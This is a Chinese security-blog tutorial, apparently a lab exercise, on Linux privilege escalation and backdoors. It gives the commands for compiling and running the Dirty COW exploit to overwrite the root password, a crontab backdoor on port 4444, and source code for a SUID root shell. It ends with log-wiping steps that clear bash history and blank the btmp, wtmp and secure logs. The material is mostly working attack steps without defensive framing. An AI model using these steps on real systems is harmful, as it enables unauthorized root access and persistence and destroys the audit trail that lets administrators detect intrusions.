freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day8-linux提权和后门植入
2020-11-16 14:12:14

linux提权和后门植入


1. 脏牛漏洞复现

(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存

(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))

wps42

wps43

(2) 进入shell然后从kali开的apache服务上下载

wps44

(3) 编译1.c文件

wps45

gcc -pthread 1.c -o dirty -lcrypt                编译.c文件


(4) 执行文件

wps46

wps47

./dirty | ./dirty 自定义密码

测试完记得将备份的password.bak(原)覆盖过去


(5) 切换改写过后的管理员账户(成功提权)

wps48


2. crontab计划任务

(1) vim /etc/crontab进入编辑(前提是有管理员权限)

wps49

(2) 重启后4444端口在运行

(3) 可以控制

wps51


3. suid提权(前提成功提权过一次,相当于留提权留后门)

(1) 创建一个suid.c的文件(由于靶机太难编辑了,所以我kali编辑完后用wget下载过去)

wps52

wps53

#include<stdlib.h> main(){setuid(0);system(“/bin/bash”);}


(2) 用wget下载suid

(3) gcc编译suid.c文件

wps55

gcc suid.c -o suid


(4) 修改suid的权限(将文件赋予执行该文件的以管理员身份执行改文件)

(5) 重启后的靶机可以直接执行./suid进行提权(不需要密码)

wps57



4. linux痕迹清除

(1) 仅清理当前用户: history -c

wps59

(2) 使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0

wps60

删除记录

(3) 删除登录失败记录:echo > /var/log/btmp

(4) 删除登录成功记录:echo > /var/log/wtmp (此时执行last命令就会发现没有记录)

wps61

(5) 删除日志记录:echo > /var/log/secure

# 内网渗透 # linux后门 # linux提权
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录